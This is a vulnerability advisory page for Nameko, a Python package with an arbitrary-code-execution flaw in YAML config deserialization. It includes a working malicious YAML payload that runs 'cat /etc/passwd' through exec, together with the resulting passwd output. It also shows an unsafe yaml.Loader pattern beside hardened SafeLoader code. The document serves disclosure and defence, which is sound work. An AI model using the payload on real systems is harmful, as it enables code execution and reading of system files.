GHSA-6p52-jr3q-c94g

Source
https://github.com/advisories/GHSA-6p52-jr3q-c94g
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/10/GHSA-6p52-jr3q-c94g/GHSA-6p52-jr3q-c94g.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-6p52-jr3q-c94g
Aliases
Published
2021-10-19T15:28:57Z
Modified
2024-10-07T15:01:15.356005Z
Severity
  • 8.6 (High) CVSS_V3 - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
  • 9.3 (Critical) CVSS_V4 - CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
Summary
Nameko Arbitrary code execution due to YAML deserialization
Details

Impact

Nameko can be tricked into performing arbitrary code execution when deserialising a YAML config file. Example:

# malicious.yaml
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"

$ nameko run --config malicious.yaml test
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
...

Patches

The problem was fixed in https://github.com/nameko/nameko/pull/722 and released in version 2.14.0, and in rc10 of the v3 pre-release.

Versions prior to 2.14.0, and v3.0.0rc0 through v3.0.0rc9 are still vulnerable.

Workarounds

The vulnerability is exploited through config files with malicious content. It can be avoided by using only config files that you trust.
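As an added example (not code from this advisory or from the Nameko project), the loader pattern that closes a CWE-502 hole like this one: a config loader built on PyYAML's SafeLoader, which has no constructor for `!!python/*` tags and therefore rejects such a document with a ConstructorError, shown next to the unrestricted loader that honours those tags. PyYAML is assumed to be installed; the `!env` tag, the config keys and both sample documents are constructed for illustration.

```python
import os
import yaml  # PyYAML, assumed installed; this is not Nameko's loader code


class ConfigLoader(yaml.SafeLoader):
    """SafeLoader only knows the plain YAML types, so any !!python/* tag
    (object/new, name, tuple, ...) has no constructor and fails to load."""


def _construct_env(loader, node):
    # Hypothetical `!env NAME:default` tag: registering project-specific
    # tags on a SafeLoader subclass avoids falling back to the full Loader.
    name, _, default = loader.construct_scalar(node).partition(":")
    return os.environ.get(name, default)


ConfigLoader.add_constructor("!env", _construct_env)


def load_config(text):
    """Hardened form: parse config with the restricted loader only."""
    return yaml.load(text, Loader=ConfigLoader)


def load_config_unsafe(text):
    """Vulnerable form (CWE-502): yaml.Loader honours !!python/* tags and
    imports modules / constructs arbitrary objects named in the file."""
    return yaml.load(text, Loader=yaml.Loader)


def is_accepted(text):
    """True if the hardened loader parses the document, False if it rejects
    it (yaml.constructor.ConstructorError is a subclass of yaml.YAMLError)."""
    try:
        load_config(text)
        return True
    except yaml.YAMLError:
        return False


# Constructed sample documents. NAMEKO_EXAMPLE_UNSET_VAR is assumed unset,
# so the !env tag falls back to its default.
BENIGN = (
    "AMQP_URI: amqp://guest:guest@localhost:5672/\n"
    "WEB_SERVER_ADDRESS: !env NAMEKO_EXAMPLE_UNSET_VAR:localhost:8000\n"
)
# A python tag that only resolves a builtin; harmless, but enough to show
# which loader accepts it and which refuses.
TAGGED = "x: !!python/name:builtins.len\n"
```

Any `!!python/` tag in a config file is a loader-level rejection with the hardened form, so the check does not depend on spotting a particular payload shape.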

Database specific
{
    "nvd_published_at": "2021-10-26T13:15:00Z",
    "cwe_ids": [
        "CWE-502"
    ],
    "severity": "CRITICAL",
    "github_reviewed": true,
    "github_reviewed_at": "2021-10-19T15:14:24Z"
}
References

Affected packages

PyPI / nameko

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version / all previous versions are affected)
Fixed
2.14.0

Affected versions

0.*

0.1.1
0.1.2
0.1.3
0.1.4
0.1.5
0.1.6
0.1.7
0.1.8
0.1.9
0.2.0
0.2.1
0.3.0
0.4.0
0.4.1
0.5.0
0.5.1
0.5.2
0.5.3
0.6.0
0.7.0

1.*

1.0.0
1.0.1
1.1.0
1.1.1
1.1.2
1.1.3
1.1.4
1.2.0
1.2.1
1.2.2
1.2.3
1.2.4
1.2.5
1.3.0
1.3.1
1.3.2
1.3.3
1.3.4
1.3.5
1.4.0
1.4.1
1.5.0
1.6.0
1.6.1
1.7.0
1.7.1
1.7.2
1.8.0
1.8.1
1.8.2
1.9.0
1.9.1
1.10.0
1.10.1
1.11.0
1.11.1
1.11.2
1.11.3
1.11.4
1.11.5
1.12.0
1.13.0
1.14.0

2.*

2.0.0
2.1.0
2.1.1
2.1.2
2.2.0
2.3.0
2.3.1
2.4.0
2.4.1
2.4.2
2.4.3
2.4.4
2.5.0
2.5.1
2.5.2
2.5.3
2.5.4
2.6.0
2.7.0
2.8.0
2.8.1
2.8.2
2.8.3
2.8.4
2.8.5
2.9.0rc0
2.9.0
2.9.1rc0
2.9.1
2.10.0
2.11.0
2.12.0
2.13.0

PyPI / nameko

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
3.0.0rc0
Fixed
3.0.0rc10

Affected versions

3.*

3.0.0rc0
3.0.0rc1
3.0.0rc2
3.0.0rc3
3.0.0rc4
3.0.0rc5
3.0.0rc6
3.0.0rc7
3.0.0rc8
3.0.0rc9

Database specific

{
    "last_known_affected_version_range": "<= 3.0.0rc9"
}